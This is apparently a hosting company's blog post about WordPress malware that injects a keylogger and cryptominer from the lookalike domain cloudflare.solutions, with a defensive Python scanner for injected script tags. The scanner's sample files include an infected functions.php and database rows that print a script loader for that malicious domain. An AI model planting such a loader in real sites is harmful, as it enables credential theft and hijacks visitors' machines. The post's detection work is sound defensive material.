Towards the end of last year, thousands of WordPress sites were discovered to be infected with a nasty bit of malware that included a keylogger and cryptocurrency miner. The malware relied on a server located at the fake cloudflare.solutions domain, which was quickly taken down, stopping it from sending data to the people behind the attack.
But the same malware appears to be back, infecting WordPress sites and loading its scripts from several new domains. It should be understood that the domains the malware uses have nothing to do with the real Cloudflare. Since the proliferation of new top-level domains over the last few years, it's straightforward for an attacker to register a name that looks like a prominent company's real domain, as cloudflare.solutions does with cloudflare.com. At a glance, an inexperienced site owner is likely to overlook a script loaded from a domain they associate with a legitimate business whose services they may already use.
At the time of writing, it appears that several thousand WordPress sites have been infected, so, if you use our Virtual Private Server or Dedicated Server hosting platform to host a WordPress site, it's worth taking a moment to make sure that it isn't infected: look through your theme files and your database for script tags that load JavaScript from a domain you don't recognise.
The malware has two roles: firstly, it logs keystrokes entered into form fields on a WordPress site and, secondly, it loads cryptomining code in the browsers of site visitors.
The keylogger is dangerous, particularly on WordPress sites that ask users to enter identifying or otherwise sensitive data, and it also captures whatever is typed into the site's own login form. Ordinarily, that type of data is encrypted by HTTPS as it travels between the browser and the server, so an eavesdropper on the network can't read it. But in this case the malicious JavaScript runs inside the page itself, so it reads the form fields in the visitor's browser before any encryption happens and sends them to the attacker's server in a separate, perfectly valid request. HTTPS protects data in transit; it can't protect a page whose own code is hostile.
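Because the malware works by getting a page to load a script from the attacker's domain, the thing to look for on your own site is that loader: a script tag pointing at a host you don't control, in theme files or in the post and option tables of the database. The scanner below is an added example written for this post; it is not Sucuri's tool and not part of WordPress. It reports the one indicator the post names (cloudflare.solutions), any host that carries a well-known brand name without belonging to that brand (the cloudflare.solutions trick in general), and any remote script outside an allowlist. The allowlist, the brand table and the sample files it scans are all assumptions constructed for the example; edit the first two for your site. It will not catch a loader whose URL is assembled from fragments or base64 at runtime, so treat a clean result as a first pass, not proof.

```python
"""Scan a WordPress install and/or a mysqldump for injected remote script loaders.

Added example for this post; not Sucuri's tool, not part of WordPress. The
allowlist, brand table and sample inputs below are assumptions for the example.
"""
import os
import re
import sys
import tempfile

# Indicator named in the post. Add domains from newer reports as they are published.
KNOWN_BAD_DOMAINS = {"cloudflare.solutions"}

# Hosts allowed to serve scripts to this site (assumption: replace with your own).
ALLOWLIST = {"cdnjs.cloudflare.com", "ajax.googleapis.com", "fonts.googleapis.com"}

# Brand name -> domains that genuinely belong to it. A host containing the brand
# name that is not under one of these is a lookalike, like cloudflare.solutions.
BRANDS = {
    "cloudflare": ("cloudflare.com",),
    "google": ("google.com", "googleapis.com", "gstatic.com"),
    "wordpress": ("wordpress.org", "wordpress.com", "wp.com"),
}

# Any absolute or protocol-relative URL, capturing the host part.
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)
# A <script> tag with a remote src; tolerates the \' quoting found in mysqldump output.
SRC_RE = re.compile(r"""<script[^>]*\ssrc\s*=\s*\\?['"]?(?:https?:)?//([a-z0-9.-]+)""", re.IGNORECASE)
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm", ".sql")


def _under(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_host(host, allowlist=ALLOWLIST):
    """Return 'known malware domain', 'lookalike of <brand>', 'allowlisted' or 'unlisted'."""
    host = host.lower().rstrip(".")
    if _under(host, KNOWN_BAD_DOMAINS):
        return "known malware domain"
    if _under(host, allowlist):
        return "allowlisted"
    for brand, genuine in BRANDS.items():
        if brand in host and not _under(host, genuine):
            return f"lookalike of {brand}"
    return "unlisted"


def scan_text(text, allowlist=ALLOWLIST):
    """Return [(line_no, host, reason)] for every suspicious host in a blob of text.

    Bare URLs (links in posts, comments) are reported only when the host is known-bad
    or a lookalike; an unlisted host is reported only when a <script> tag loads it.
    """
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        script_hosts = {m.group(1).lower() for m in SRC_RE.finditer(line)}
        seen = set()
        for m in HOST_RE.finditer(line):
            host = m.group(1).lower()
            reason = classify_host(host, allowlist)
            if reason == "allowlisted":
                continue
            if reason == "unlisted":
                if host not in script_hosts:
                    continue
                reason = "remote script outside allowlist"
            if (host, reason) not in seen:
                seen.add((host, reason))
                findings.append((line_no, host, reason))
    return findings


def scan_path(root, allowlist=ALLOWLIST):
    """Scan one file or a whole tree (e.g. the WordPress directory plus a mysqldump file)."""
    paths = [root] if os.path.isfile(root) else (
        os.path.join(d, f) for d, _, files in os.walk(root) for f in files)
    report = []
    for path in paths:
        if not path.lower().endswith(SCAN_EXTENSIONS):
            continue
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
        except OSError:
            continue
        report.extend((path, n, h, r) for n, h, r in scan_text(text, allowlist))
    return report


# Constructed sample inputs (not real captured files), modelled on the post's description:
# a theme functions.php that prints a loader for the fake domain into every page ...
INFECTED_FUNCTIONS_PHP = """<?php
add_action('wp_head', 'theme_assets');
function theme_assets() {
    echo "<script type='text/javascript' src='//cloudflare.solutions/ajax/libs/loader.js'></script>";
}
"""
# ... an untouched header that loads jQuery from an allowlisted CDN ...
CLEAN_HEADER_PHP = """<?php
echo '<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>';
"""
# ... and three rows of a mysqldump: an injected post, a lookalike host in wp_options, a clean link.
DUMP_SQL = r"""INSERT INTO `wp_posts` VALUES (12,'<p>Hello</p><script src=\'https://cloudflare.solutions/ajax/libs/loader.js\'></script>','publish');
INSERT INTO `wp_options` VALUES (99,'footer_html','<script src=\'https://wordpress-cdn.example/wp.js\'></script>','yes');
INSERT INTO `wp_posts` VALUES (13,'<p>Read more at <a href="https://wordpress.org/support/">the forums</a></p>','publish');
"""


def demo():
    """Write the constructed samples into a scratch tree and scan it; returns the report."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "mytheme")
        os.makedirs(theme)
        for name, body in (("functions.php", INFECTED_FUNCTIONS_PHP), ("header.php", CLEAN_HEADER_PHP)):
            with open(os.path.join(theme, name), "w") as fh:
                fh.write(body)
        with open(os.path.join(root, "wp.sql"), "w") as fh:
            fh.write(DUMP_SQL)
        return sorted(scan_path(root))


if __name__ == "__main__":
    hits = scan_path(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for path, line_no, host, reason in hits:
        print(f"{path}:{line_no}: {host} ({reason})")
```

To run it against a real site, dump the database first (for example `mysqldump --single-transaction wordpress > /tmp/wp.sql`) and point the script at the WordPress directory and then at the dump file; the database matters because the loader is as likely to sit in a post or an option as in functions.php. Every hit needs a human look: a lookalike host or an unlisted script is a lead, not a verdict, while a hit on the known-bad domain is a confirmed infection.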
The cryptomining scripts cause problems for site visitors instead. Cryptocurrencies are created by a process called mining: repeatedly computing cryptographic hashes on a CPU or GPU until one meets the network's difficulty target. Whoever gets there first earns the block reward, paid in newly created coins.
Because a great deal of computing power is needed to earn even a small amount, one way around the cost is to spread the work across lots of other people's computers, which is exactly what the cryptomining script does: every visitor's browser mines for the attacker for as long as the page is open. The attacker gains cryptocurrency without having to invest in expensive hardware or pay for electricity. The visitor pays instead, in CPU time, battery and power, and in a machine that slows to a crawl, which is not something any site owner should inflict on their users, least of all those on mobile devices.
It's not clear how the malware infects WordPress sites in the first place, but the usual suspects are probably to blame: outdated WordPress installs, plugins and themes with known vulnerabilities that haven't been patched. Keep your WordPress sites, and everything installed in them, up to date, folks!
If your site is infected, the most certain and effective way to remove the malware is to reinstall WordPress and restore your files and database from a backup you're sure is uninfected; check that the backup predates the infection, and check it for the same injected script tags, or you will simply restore the malware along with everything else. Restoring alone doesn't close whatever hole let the attacker in, so update everything once the site is back, and change the passwords of every WordPress user who logged in while the site was infected, since the keylogger will have captured what they typed into the login form. If a full restore isn't an option for you, Sucuri has an excellent guide to removing malware from a hacked WordPress site.